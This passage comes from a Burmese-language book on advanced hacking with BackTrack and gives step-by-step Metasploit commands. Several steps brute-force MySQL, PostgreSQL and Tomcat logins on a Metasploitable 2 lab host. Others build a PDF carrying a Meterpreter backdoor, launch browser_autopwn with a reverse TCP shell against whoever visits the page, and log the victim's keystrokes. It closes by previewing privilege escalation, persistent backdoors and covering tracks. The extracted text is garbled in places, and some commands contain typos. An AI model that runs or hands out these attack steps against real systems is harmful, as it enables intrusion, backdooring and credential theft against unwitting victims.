၆။ Metasploitable 2 Machine သို႕မဟုတ္ Target ၏ Host သိ႕ု RHOST ကိုသတ္မွတ္ရန္

set RHOSTS 192.168.10.111

၇။ Username အတြက္အသံုးျပဳမည္႕ Word List ဖိုင္၏ လမ္းေၾကာင္းကို သတ္မွတ္ေပးရမည္။

set user_file /root/Desktop/usernames.txt

၈။ ထို႕ေနာက္ Password အတြက္ အသံုးျပဳမည္႕ Word List ဖိုင္လမ္းေၾကာင္းကို သတ္မွတ္ေပးရမည္။

set pass_file /root/Desktop/passwords.txt

၉။ Exploit ကိုေမာင္းႏွင္ရပါမည္။

exploit

၁၀။ ထိုအခါ Metasploit သည္ ျဖစ္ႏုိင္ဖြယ္ရာ Username မ်ားအားလံုးႏွင့္ Password မ်ားအားလံုး၏


အတြအ
ဲ စပ္ကိုအသံုးျပဳ၍ မွန္ကန္ေသာ Username ႏွင့္ Password ကိုတိုက္ဆိုင္၍ ရွာေဖြမည္ျဖစ္သည္။

မ်က္ပြင့္စာေပ 153
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

ထုိ႕ေၾကာင့္ အလုပ္လုပ္ေဆာင္မည္႕ login name ႏွင့္ Password အတြအ


ဲ စပ္မ်ားကို ေရွ႕ဆက္ရန္ + Sign
ကို Locate ျပဳလုပ္ေနရာခ်ထားပါ။

အလုပ္လုပ္ေဆာင္ပုံကိုေလ့လာၾကည္႕မည္ဆိုပါက Metasploit ၏ MSFCONSOLE ကို Target ျဖစ္ေသာ


Metasploitable 2 Host ေပၚတြင္ MySQL အားနည္းခ်က္ယိုေပါက္မ်ားကို exploit ျပဳလုပ္ရန္အသံုးျပဳပါ
သည္။ Console ကို Launching ျပဳလုပ္ျခင္းျဖင့္ ယခုအပိုင္းမွ ေလ့လာစရာမ်ားကို စတင္ေလ့လာခဲ့ၿပီး
ရွာေဖြေဖာ္ထုတ္ၿပီးျဖစ္ေသာ MySQL အားနည္းခ်က္ယိုေပါက္မ်ားကို ရွာေဖြျခင္းကို ျပဳလုပ္ခဲ့ပါသည္။
MySQL Login exploit ကို ေရြးခ်ယ္ၿပီးေနာက္ MySQL Login ကို Brute force attack ျပဳလုပ္ျခင္းကို
လုပ္ေဆာင္ခဲ့ပါသည္။ Option မ်ားကိုသတ္မွတ္ေပးၿပီးေနာက္ Exploit ကို Execute ျပဳလုပ္ခဲ့ၾကပါသည္။
Exploit မွ ေထာက္ပံ့ေသာ Username ႏွင့္ Password List file မ်ားကိုအသံုးျပဳၿပီး Metasploit သည္
MySQL database ကို ထိုးေဖာက္ရန္အတြက္ Brute- force attack ကိုျပဳလုပ္ခဲ့ပါသည္။

ယခုအပိုင္းတြင္ မိမိဖာသာျပဳလုပ္ထားေသာ Username ႏွင့္ Password File မ်ားကို အသံုးျပဳခဲ့ပါသည္။


ထိုသို႕ေသာ Username ႏွင့္ Password List File မ်ား ျပဳလုပ္ရန္အတြက္ နည္းလမ္းေျမာက္မ်ားစြာရိွၿပီး
ထိုသို႕ေသာ Word List ဖိုင္မ်ားျပဳလုပ္ျခင္း နည္းလမ္းမ်ားကို Chapter 9, Password Cracking အခန္းတြင္
ေဖာ္ျပထားပါသည္။

Metasploitable PostgreSQL
ယခုအပိုင္းတြင္ PostgreSQL Scanner module ကိုအသံုးျပဳျခင္းျဖင့္ PostgreSQL database server
တစ္ခုကို attack လုပ္ရန္မည္ကဲ့သို႕အသံုးျပဳရမည္ ဆိုသည္႕အခ်က္ကိုေဖာ္ျပေပးထားပါသည္။ Postgre
SQL ကို ကမၻာ့အဆင့္အျမင့္ဆံုး Open Source database ဟုခ်ီးက်ဴးမႈမ်ားအျပင္ မ်ားစြာေသာ အသံုးျပဳသူ

154 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

မ်ားကလည္း Enterprise အဆင့္ရိွေသာ Database တစ္ခုဟုလည္း ဆိုၾကပါသည္။ ထိုသို႕ေသာ Postgre


SQL သို႕၀င္ေရာက္ရန္ ျဖတ္သန္းရေသာ Login ကို Metasploit ကိုအသံုးျပဳ၍ Brute-force attack ျဖင့္
တိုက္ခိုက္ျခင္းကို ေဖာ္ျပေပးမည္ျဖစ္သည္။

ယခုအပိုင္းကိုလုပ္ေဆာင္ႏိုင္ရန္အတြက္

 Internal Network Connection တစ္ခု


 Hacking လုပ္ငန္းေဆာင္ရြက္ေနမည္႕ ကြန္ပ်ဴတာတြင္ Metasploit ေမာင္းႏွင္ထားရန္
 Dictionary Attack ျပဳလုပ္ရန္အတြက္ အသံုးျပဳရမည္႕ Word List မ်ားလိုအပ္ပါမည္။

Terminal Window တစ္ခုကို ဖြင့္ျခင္းျဖင့္ PostgreSQL attack ကိုစတင္ၾကည္႕ပါမည္။

၁။ Command Prompt ကိုဖြင့္ပါ။

၂။ MSFCONSOLE ကို Launch ျပဳလုပ္ရန္ ေအာက္ပါ Command ကိုအသံုးျပဳပါ။

msfconsole

၃။ ထို႕ေနာက္ အသံုးျပဳႏိုင္မည္႕ PostgreSQL module မ်ားကို ရွာဖြရပါမည္။

search postgresql

၄။ ထို႕ေနာက္ PostgreSQL Login Utility ကိုအသံုးျပဳရပါမည္။

use /auxiliary/scanner/ postgres/postgres_login

မ်က္ပြင့္စာေပ 155
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၅။ Module ၏ ျဖစ္ႏိုင္ဖြယ္ရာ Option ကို ၾကည္႕ရန္အတြက္

show options

၆။ Metasploitable 2 အသံုးျပဳထားေသာ Machine သို႕မဟုတ္ Target ၏ Host တြင္ RHOST ကို


သတ္မွတ္ႏိုင္ရန္အတြက္

set RHOSTS 192.168.10.111

၇။ Username မ်ားပါ၀င္ေသာ Wordlist File ရိွသည္႕လမ္းေၾကာင္းကို သတ္မွတ္ေပးရပါမည္။


ႀကိဳက္ႏွစ္သက္ရာ Wordlist ကိုအသံုးျပဳႏိုင္ေသာ္လည္း ယခုေနရာတြင္ Metasploit မွအဆင္သင့္ပါ၀င္
ေသာ Username Wordlist ကိုသာအသံုးျပဳထားပါသည္။

set user_file /opt/metasploit/msf3/data/wordlists/postgres_default_user.txt

၈။ ထို႕အတူ Password Wordlist ဖိုင္၏ လမ္းေၾကာင္းကိုလည္း သတ္မွတ္ေပးရပါမည္။ ႏွစ္သက္ရာကို


အသံုးျပဳႏိုင္ေသာ္လည္း ယခုေနရာတြင္ အဆင္သင့္ပါ၀င္ေသာ Word List ဖိုင္ကိုသာ အသံုးျပဳပါမည္။

set pass_file /opt/metasploit/msf3/data/wordlists/postgres_default_user.txt

156 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၉။ ထို႕ေနာက္ exploit ကိုေမာင္းႏွင္ေပးရပါမည္။

exploit

ယခုအပိုင္းတြင္ Target Metasploitable 2 Host ေပၚတြင္ PostgreSQL အားနည္းခ်က္ယိုေပါက္ကို နင္း၍


Metssploit ၏ MSFCONSOLE ကိုအသံုးျပဳ၍ Exploit ျဖင့္တိုက္ခိုက္ျခင္းကို ေဖာ္ျပေပးခဲ့ပါသည္။ Console
ကို Launching ျပဳလုပ္ျခင္းျဖင့္ စတင္ခဲ့ၿပီး ေတြ႕ရိွထားၿပီးျဖစ္ေသာ PostgreSQL အားနည္းခ်က္ယိုေပါက္
မ်ားကိုရွာဖြခဲ့ၾကပါသည္ PostgreSQL Login Exploit ကိုေရြးခ်ယ္ၿပီးေနာက္ ၄င္းသည္ PostgreSQL ကို
Login ၀င္ေရာက္ေစႏိုင္ရန္အတြက္ Brute force attack ကိုျပဳလုပ္ေပးေစႏိုင္ပါသည္။ ထိုသို႕ Attack
ျပဳလုပ္ရန္အတြက္ Exploit ၏ Option မ်ားကိုသတ္မွတ္ေပးၿပီး Exploit ကို Execute ျပဳလုပ္ခဲ့ပါသည္။
Metasploit သည္ ျဖစ္ႏိုင္ဖြယ္ရာ Username အားလံုးႏွင့္ Password မ်ား၏ အတြအ
ဲ စပ္ကို Wordlist
ဖိုင္မ်ားမွ စာလံုးမ်ားႏွင့္ တိုက္ဆိုင္စစ္ေဆးမည္ျဖစ္ပါသည္။

ယခုအပိုင္းတြင္ Username မ်ား၊ Password မ်ားကိုသိရိွႏိုင္ရန္အတြက္ ပံုမွန္ Wodlist file မ်ားကိုသာ


အသံုးျပဳခဲ့ပါသည္။ ထိုနည္းတူစြာပင္ ထိုဖိုင္မ်ားကို ကုိယ္တိုင္ျပဳလုပ္ႏိုင္ပါသည္။ ထိုသို႕ေသာ Username

မ်က္ပြင့္စာေပ 157
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

ႏွင့္ Password Word List မ်ားကို ျပဳလုပ္ရန္ နည္းလမ္းေျမာက္ျမားစြာရိွၿပီး ထိုသို႕ေသာ ဖိုင္မ်ားျပဳလုပ္နည္း


ကို Chapter 8, Voice Over IP (VoIP) အခန္းတြင္ေလ့လာႏိုင္မည္ျဖစ္သည္။

Metasploitable Tomcat
ယခုအပိုင္းတြင္ Tomcat Manager Login Module ကိုအသံုးျပဳ၍ Tomcat Server တစ္ခုကို Attack
ျပဳလုပ္ျခင္းကို ေလ့လာၾကည္႕ၾကပါမည္။ ထိုသို႕ျပဳလုပ္ရန္အတြက္ Metasploit ကိုမည္ကဲ့သို႕ အသံုးျပဳမည္
ကို စူးစမ္းၾကည္႕ၾကပါမည္။ Tom သိ႕ု မဟုတ္ Apache Tomct သည္ Open Source Web Server
တစ္ခုျဖစ္ၿပီး Java Servlet မ်ားႏွင့္ JavaServer Pages မ်ားကိုေမာင္းႏွင္ရန္အတြက္ Servlet continer
တစ္ခုဟုလည္းဆိုႏိုင္ပါသည္။ Tomcat ကို Java စစ္စစ္ျဖင့္သာေရးသားထားျခင္းျဖစ္ၿပီး ယခုအပိုင္းတြင္
Tomcat Login ကုိ Brute Force Attack ျပဳလုပ္ရန္အတြက္ Metasploit အသံုးျပဳရျခင္းကို ေလ့လာၾကည္႕
ၾကမည္ျဖစ္ပါသည္။

ယခုအပို္င္းကိုအသံုးျပဳရန္အတြက္

 Internal Network Connection တစ္ခု


 Metasploitable ေမာင္ႏွင္ထားသည္႕ Hacking ျပဳလုပ္မည္႕ ကြန္ပ်ဴတာႏွင့္
 Dictionary Attack ျပဳလုပ္ႏိုင္ရန္အတြက္ Word List ဖိုင္မ်ားကို လိုအပ္မည္ျဖစ္သည္။

ယခုအပိုင္းကို စတင္ေစႏိုင္ရန္အတြက္ Terminal Window ကိုဖြင့္၍ အသံုးျပဳရပါမည္။

၁။ Open Prompt ကိုဖြင့္ပါ။

၂။ MSFCONSOLE ကုိ launch ျပဳလုပ္ရန္အတြက္ ေအာက္ပါ Command ကိုအသံုးျပဳရပါမည္။

msfconsole

၃။ ျဖစ္ႏိုင္ဖြယ္ရာရိွေသာ Tomcat module မ်ားကို ရွာေဖြေပးရပါမည္။

search tomcat

158 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၄။ ထို႕ေနာက္ Tomcat Application Manager Login Utility ကိုအသံုးျပဳရပါမည္။

use auxiliary/scanner/http/tomcat_mgr_login

၅။ Module ၏ အသံုးျပဳႏိုင္ေသာ Option မ်ားကို ၾကည္႕ရွဳရန္အတြက္

show options

သတိျပဳရန္။ ။item အမ်ားစုအတြက္ yes ဟုသာသတ္မွတ္ေပးရန္လိုအပ္ပါသည္။ နဂိုမူလအေျခအေန


အတိုင္းသာ အသံုးျပဳမည္ျဖစ္သည္႕အတြက္ေၾကာင့္ ျဖစ္သည္။

၆။ Password မ်ားပါရိွေသာ Word list ဖိုင္ (PASS_FILE) ရိွသည္႕လမ္းေၾကာင္းကို သတ္မွတ္ေပးရပါမည္။

PASS_FILE mset /opt/metasploit/msf3/data/wordlists/tomcat_mgr_default_pass.txt

၇။ Username မ်ားပါရိွေသာ Word list ဖိုင္ (USER_FILE) ရိွသည္႕ေနရာကို သတ္မွတ္ေပးရန္လိုအပ္ပါ


သည္။

USER_FILE mset /opt/metasploit/msf3/data/wordlists/tomcat_mgr_default_users.txt

၈။ Target RHOST ကိုသတ္မွတ္ေပးရပါမည္။ ယခုေနရာတြင္ Metasploitable 2 Machine ကုိေရြးခ်ယ္ေပး


ပါ။

set RHOSTS 192.168.10.111


မ်က္ပြင့္စာေပ 159
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၉။ RPORT ကို 8180 ဟု သတ္မွတ္ေပးရပါမည္။

set RPORT 8180

၁၀။ Exploit ကိုေမာင္းႏွင္ေပးရပါမည္။

exploit

ယခုအပိုင္းတြင္ Taarget Metasploitable 2 host ေပၚတြင္ Tomcat ၏ အားနည္းခ်က္ယိုေပါက္မွတစ္ဆင့္


တိုက္ခိုက္ႏိုင္ရန္အတြက္ Metasploit ၏ MSFCONSOLE ကိုအသံုးျပဳခဲ့ပါမည္။ Console ကို Launch
ျပဳလုပ္ျခင္းျဖင့္ စတင္ရမည္ျဖစ္ၿပီး ရွာေဖြေတြ႕ရိွၿပီးျဖစ္သည္႕ Tomcat အားနည္းခ်က္မ်ားကို အသံုးျပဳခဲရ
့ ပါ
သည္။ Tomcat Login exploit ကိုေရြးခ်ယ္ၿပီးေသာအခါတြင္ Tomcat login ကို Brute-force ျဖင့္
တိုက္ခိုက္ခဲ့ပါသည္။ Option မ်ားကိုသတ္မွတ္ၿပီးေနာက္ exploit ကို execute ျပဳလုပ္ျခင္းကိုလည္း
ေဖာ္ျပခဲ့ပါသည္။ Metasploit သည္ ျဖစ္ႏို္င္ဖြယ္ရာ Username မ်ားႏွင့္ Password အစုအေ၀းကို
အသံုးျပဳၿပီး တိုက္ဆိုင္စစ္ေဆးၿပီးေနာက္ Login Password ကုိရွာေဖြျခင္းျဖစ္ပါသည္။

Metasploitable PDF
ယခုအပိုင္းတြင္ Adobe PDF Embedded module ကိုအသံုးျပဳ၍ Portable Document Format (PDF)
Document တစ္ခုကို Password ရွာေဖြျခင္းကို ေလ့လာၾကည္႕ၾကပါမည္။ ထိုသို႕ရွာေဖြရန္အတြက္ကိုလည္း
ထံုးစံအတိုင္း Metasploit ကိုအသံုးျပဳရပါမည္။ Adobe PDF တစ္ခုကို တစ္ေနရာ ေနာက္တစ္ေနသို႕
Document တစ္ခုအျဖစ္ပို႕ေဆာင္ႏိုင္ရန္အတြက္ စံအျဖစ္ သတ္မွတ္ေလ့ရိွပါသည္။ ထိုကဲ့သို႕ အသံုးတြင္
က်ယ္ျခင္းေၾကာင့္ စစ္မွန္ေသာ PDF document ဟုထင္ေစျခင္းျဖင့္ အသံုးျပဳသူ၏ Machine ကို တိုက္ခိုက္
ေစရန္အတြက္ အသံုးျပဳနိုင္ပါသည္။

ယခုအပိုင္းကို စတင္ေစရန္အတြက္

 Internal Network Connection တစ္ခုကိုအသံုးျပဳရပါမည္။


 Metasploit တင္ထားေသာ ကြန္ပ်ဴတာတစ္လံုးကိုလည္း လိုအပ္ပါမည္။
160 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

 ထို႕အျပင္ Dictionary Attack ျပဳလုပ္မည္႕ Word List ကိုလည္း လိုအပ္ပါမည္။

၁။ Terminal Window ကိုဖြင့္ပါ။

၂။ MSFCONSOLE ကို Launch ျပဳလုပ္ၿပီး ေအာက္ပါ Command ကိုရိုက္ထည္႕ေပးရပါမည္။

msfconsole

၃။ ထို႕ေနာက္ အသံုးျပဳႏိုင္မည္႕ PDF Module မ်ားကိုရွာေဖြၾကည္႕ရပါမည္။

search pdf

၄။ Adobe PDF Embedded EXE Social Engineering module ကိုအသံုးျပဳရပါမည္။

use exploit/windows/fileformat/adobe_pdf_embedded_exe

၅။ Module အတြက္ အသံုးျပဳႏိုင္မည္႕ Option မ်ားကိုၾကည္႕ရွဳရန္အတြက္ ေအာက္ပါ Command


ကိုအသံုးျပဳပါ။

show options

မ်က္ပြင့္စာေပ 161
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၆။ PDF အျဖစ္ အသံုးျပဳမည္႕ ဖိုင္အမည္ကို သတ္မွတ္ရန္အတြက္ ေအာက္ပါ Command ကိုအသံုးျပဳပါ။

set FILENAME evildocument.pdf

၇။ infilename ကိုသတ္မွတ္ေပးရပါမည္။ ၄င္းသည္ အသံုးျပဳမည္႕ PDF ဖိုင္၏ လမ္းေၾကာင္းျဖစ္ပါသည္။


ယခုေနရာတြင္ ၄င္းကို Desktop ေပၚတြင္သာ သတ္မွတ္ေပးရပါမည္။

set INFILENAME /root/Desktop/willie.pdf

မွတ္ရန္။ ။ INFILENAME option မွတပါး အျခားေသာ Option မ်ားကို နဂိုမူလအတိုင္း (Optional)


အျဖစ္သာ ထားရပါမည္။

၈။ Exploit ကုိေမာင္းႏွင္ေပးရပါမည္။

exploit

162 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

ယခုအပိုင္းတြင္ Meterpreter backdoor တစ္ခုပါ၀င္ေသာ Adobe PDF ဖိုင္တစ္ခုကို MSFCONSOLE


ကိုအသံုးျပဳ၍ တည္ေဆာက္ျခင္းလုပ္ငန္းစဥ္ကိုေဖာ္ျပခဲ့ပါသည္။ Console ကို Launching ျပဳလုပ္ျခင္းျဖင့္
ယခုအခန္းကို စတင္ခဲ့ၿပီး သိရိွထားၿပီးျဖစ္ေသာ PDF ၏ အားနည္းခ်က္မ်ားကို ရွာေဖြခဲ့ရပါသည္။ ထို႕ေနာက္
Embedded EXE PDF exploit ကိုအသံုးျပဳရန္ ေရြးခ်ယ္ခဲ့ၿပီးေနာက္ ၄င္းသည္ စစ္မွန္ေသာ PDF အတြင္း
တြင္ Backdoor Program တစ္ခုကို သိ၀
ု ွက္ထားရန္အတြက္ ခြင့္ျပဳေပးပါသည္။ ထိ႕ု ေနာက္ Option မ်ားကို
သတ္မွတ္ေပးၿပီး Exploit ကိုေမာင္းႏွင္ခဲ့ပါသည္။ Target ကြန္ပ်ဴတာမွ အသံုးျပဳသူတစ္ဥိးသည္ အဆိုပါ
PDF ဖိုင္ကို ဖြင့္လိုက္ေသာအခါ Meterpreter သည္ ထို Target ကြန္ပ်ဴတာကို Active Session အျဖစ္
သိရိွပါလိမ့္မည္။

Implementing the browser_autopwn module


Browser_autopwn ဆိုသည္မွာ Metasploit မွေထာက္ပံ့ေသာ Auxilary module တစ္ခုျဖစ္ၿပီး အသံုးျပဳ
သူတစ္ဦးမွ Web Page တစ္ခုသို႕၀င္ေရာက္ေသာအခါတြင္ ထိုသို႕၀င္ေရာက္သူ၏ Machine ကို Attack
ျပဳလုပ္ရန္အတြက္ ခြင့္ျပဳေပးပါသည္။ Browser_autopwn သည္ Client ၏ Fingerprint ကို တိုက္ခိုက္မႈ
မျပဳလုပ္မီတြင္ ေျခရာၿခံေပးပါသည္။ ထိ႕ု ေၾကာင့္ Mozilla Firefox Exploit ကိုအသံုးမျပဳဘဲ Internet
Explorer 7 Browser ကိုသာအသံုးျပဳပါမည္။ အသံုးျပဳမည္႕ Browser ကို ၾကည္႕၍ အသံုးျပဳမည္႕
အေကာင္းဆံုးေသာ Exploit ကိုဆံုးျဖတ္ေစႏိုင္ပါမည္။

ယခုအပိုင္းကို လုပ္ေဆာင္ရန္အတြက္ Internet သိ႕ု မဟုတ္ Internal Network Connection တစ္ခုကို


အသံုးျပဳရပါမည္။

၁။ Termianl Window ကိုဖြင့္ပါ။

၂။ MSFCONSOLE ကို Launch ျပဳလုပ္ေစရန္ ေအာက္ပါ Command ကိုအသံုးျပဳရပါမည္။

msfconsole

၃။ AutoPwn Module မ်ားကိုရွာေဖြရန္အတြက္

search autopwn

မ်က္ပြင့္စာေပ 163
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၄။ Broser_autopwn module ကိုအသံုးျပဳရန္အတြက္

use auxiliary/server/browser_atuopwn

၅။ Payload ကိုသတ္မွတ္ေပးရမည္။ ယခုေနရာတြင္ Windows Reverse TCP ကိုအသံုးျပဳပါမည္။


ထို႕ေၾကာင့္

set payload windows/meterpreter/reverse_tcp

၆။ Payload ၏ အမိ်ဳးအစားမ်ားအတြက္ Option မ်ားကိုရွာေဖြရန္အတြက္

show options

၇။ ထိ႕ု ေနာက္ Reverse Connection ကိုျပဳလုပ္ရန္အတြက္ Host IP Address ကိုသတ္မွတ္ေပးရပါမည္။


ယခုေနရာတြင္ PC ၏ IP Address ကိုသတ္မွတ္ရန္ျဖစ္သည္႕အတြက္ 192.168.10.109 ဟုေရြးခ်ယ္ေပး
ရပါမည္။

set LHOST 192.168.10.109

164 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၈။ ထိ႕ု အျပင္ URI path ကိုသတ္မွတ္ရန္ လိုအပ္ပါမည္။ ယခုေနရာတြင္ “filetypes” (“” ကိုပါ ထည္႕သြင္း
အသံုးျပဳရပါမည္) ကိုအသံုးျပဳရပါမည္။

set URIPATH “filetypes”

၉။ ေနာက္ဆံုးအေနျဖင့္ Exploit ကိုစတင္ရန္အတြက္ ေအာက္ပါ Command ကို အသံုးျပဳရပါမည္။

exploit

၁၀။ http://[provided IP Address] :8080 ဟူေသာ IP Address မွ Exploit ကိုစတင္ရန္ Metasploit


ကိုအသံုးျပဳပါ။

၁၁။ ေဖာ္ျပပါ Address သိ႕ု တစ္စံုတစ္ေယာက္ ၀င္ေရာက္ၾကည္႕ရွဳေသာအခါတြင္ ထို၀င္ေရာက္သူ၏


စက္ကို Remote Session အျဖစ္ျဖင့္ ထိ္န္းခ်ဳပ္ရန္အတြက္ Browser_autopwn module မ်ားမွ ခ်ိတ္ဆက္
ရန္ ႀကိဳးပမ္းပါမည္။ အကယ္၍ အဆင္ေျပခဲ့ပါက Meterpreter သည္ ထို Session ကိုသိရိွသြားမည္ျဖစ္ပါ
သည္။ ထို Session ကို Activate ျပဳလုပ္ရန္အတြက္ ေအာက္တြင္ေဖာ္ျပထားသည္႕အတိုင္း Session
Command ကိုအသံုးျပဳရပါမည္။

session –i 1

၁၂။ ေမာင္းႏွင္ေစႏိုင္ေသာ Command မ်ားကို ၾကည္႕ရွဳေစလိုပါက Help ဟုရိုက္ထည္႕၍ ၾကည္႕ရွဳႏိုင္ပါ


သည္။

help

၁၃။ ထိုအခါ အသံုးျပဳလိုေသာ Command မ်ားကို List ျပဳလုပ္ေဖာ္ျပေပးမည္ျဖစ္ပါသည္။ ထိုအခါတြင္


Keystroke Scan (Keyboard မွရိုက္ထည္႕ေသာ စာသားမ်ားကို ဖမ္းယူမွတ္သားျခင္း) ကိုလုပ္ေဆာင္
ၾကည္႕ရန္အတြက္ ေအာက္ပါ Command ကိုအသံုးျပဳရပါမည္။

keyscan_start

၁၄။ ဖမ္းယူထားေသာ Keystoke မ်ားကို ၾကည္႕ရွဳႏိုင္ရန္အတြက္ ေအာက္ပါ Keyscan_dump Command


ကို အသံုးျပဳႏိုင္ပါသည္။

မ်က္ပြင့္စာေပ 165
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

keyscan_dump

ယခုအပိုင္းတြင္ MSFCONSOLE ကိုအသံုးျပဳ၍ Browser_autopwn exploit ကို Launch ျပဳလုပ္ျခင္းကို


ေလ့လာခဲ့ၾကပါသည္။ Console ကို Launching ျပဳလုပ္ျခင္းႏွင့္ ယခုအပိုင္းကိုစတင္ခဲ့ၿပီး ထံုးစံအတိုင္းပင္
ေဖာ္ထုတ္ၿပီးျဖစ္ေသာ Autopwn Module မ်ားကို ရွာေဖြခဲ့ၾကပါသည္။ ထို႕ေနာက္ Autopwn Module ကို
ေရြးခ်ယ္ၿပီးေသာအခါတြင္ Exploit ျပဳလုပ္ျခင္း ေအာင္ျမင္ခဲ့လွ်င္ Connection ကိုျပန္ရရန္အတြက္
အသံုးျပဳႏိုင္ေသာ Windows Reverse TCP တြင္ Payload ကိုသတ္မွတ္ေပးရပါမည္။ ထို႕ေနာက္
သားေကာင္သည္ Web Page သို႕၀င္ေရာက္ေသာအခါတြင္ Exploit လည္း ေအာင္ျမင္ခဲ့ပါက ထိုးေဖာက္
၀င္ႏုိင္ေစမည္႕ Meterpreter Session ကို ေတြ႕ျမင္ရပါမည္။

166 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

Chapter 6

Privilege Escalation
အထူးအခြင့္အေရးေတာင္းဆိုျခင္း

မ်က္ပြင့္စာေပ 167
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

Introduction
စနစ္တစ္ခုကို Attack ျပဳလုပ္ၿပီးေနာက္ ထို ကြန္ပ်ဴတာစနစ္အတြင္းသို႕ ၀င္ေရာက္ႏိုင္သြားေသာအခါတြင္
အေရးႀကီးေသာအခ်က္တစ္ခုအျဖစ္ ျပဳလုပ္ရမည္႕အခ်က္တစ္ခုမွာ ျဖစ္ႏိုင္သမွ် အခြင့္အေရး (Privilege)
ကို တိုးျမွင့္ရန္ (escalate) ျခင္းတို႕ကို လုပ္ေဆာင္ရန္ျဖစ္သည္။ အႀကမ္းျဖင္းအားျဖင့္ ထုိးေဖာက္၀င္ေရာက္
ေသာအခါ ရရိွလာမည္႕ Account သည္ လုပ္ပိုင္ခြင့္အားနည္းေသာ (Low Privilege) Computer User
မ်ားသာ ျဖစ္ေလ့ရိွပါသည္။ သို႕ရာတြင္ အမွန္တကယ္ ထိုးေဖာက္လိုေသာ Account သည္ Administrator
Account သာျဖစ္ပါသည္။ ထိ႕ု ေၾကာင့္ ယခုအခန္းတြင္ အခြင့္အေရးကို တိုးၿမွင့္ျခင္း (သာမန္ User Account
မွ Administrator Account သိ႕ု တိုးၿမွင့္ျခင္း) နည္းလမ္းမ်ားကို ေဖာ္ျပေဆြးေႏြးသြားၾကမည္ျဖစ္သည္။ ယခု
အခန္းတြင္ ေလ့လာရမည္႕ အပိုင္းမ်ားမွာ

 Using Impersonation Tokens


 Local Privilege Escalation Attack
 Mastering the Social-Engineer Toolkit (SET)
 Collecting Victims’ data
 Cleaning up the tracks
 Creating a persistent backdoor
 Man-in-the-middle attack (MITM) တို႕ျဖစ္ၾကပါသည္။

Using impersonating tokens


ယခုအပိုင္းတြင္ အေယာင္ေဆာင္တိုကင္ (impersonating token) မ်ားကိုအသံုးျပဳ၍ Network တစ္ခုေပၚ
တြင္ User Account တစ္ခုသို႕အေယာင္ေဆာင္ျခင္းကို လုပ္ေဆာင္ၾကည္႕ပါမည္။ Window System ေပၚ
သို႕ User တစ္ဦးမွ Log In ၀င္ေရာက္ေသာအခါတြင္ မွန္ကန္ေသာ Session တစ္ခုအျဖစ္ ၀င္ေရာက္ခြင့္
တိုကင္ (access token) တစ္ခုကို ထုတ္ေပးပါသည္။ တိုကင္အတုအေယာင္ (Token impersonation)
သည္ User တစ္ဦးကုိ အေယာင္ေဆာင္ျခင္းျဖင့္ အခြင့္အေရး (privilege) ကုိ တိုးျမွင့္ (escalate) ေပးေစ
ပါသည္။ System Account တစ္ခုသည္ ဥပမာအားျဖင့္ သတ္မွတ္ထားေသာ အလုပ္မ်ားကို ေဆာင္ရြက္ေစ

168 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

ႏိုင္ရန္အတြက္ Domain Administrator အျဖစ္အသံုးျပဳရန္ လိုအပ္ေကာင္းလိုအပ္ပါမည္။ ထို႕ေနာက္


ၿပီးဆံုးေသာအခါတြင္ ၄င္းသည္ ေယဘုယ်အားျဖင့္ ျပန္လည္တပ္ဆုတ္ရန္အတြက္ ၄င္း၏ လုပ္ပိုင္ခြင့္ကို
ျမွင့္တင္ရန္လည္း လိုအပ္ေကာင္းလိုအပ္ပါလိမ့္မည္။ ထိုသို႕ေသာအခ်က္မ်ားေၾကာင့္ လုပ္ေဆာင္ပိုင္ခြင့္
တိုးၿမွင့္ရန္အတြက္ အားနည္းခ်က္မ်ားရွာေဖြျခင္းကို ယခုအပိုင္းတြင္ေလ့လာရပါမည္။

ယခုအပိုင္းကုိၿပီးေျမာက္ေစရန္အတြက္ ေအာက္ပါအခ်က္မ်ားကို လုိအပ္ပါမည္။

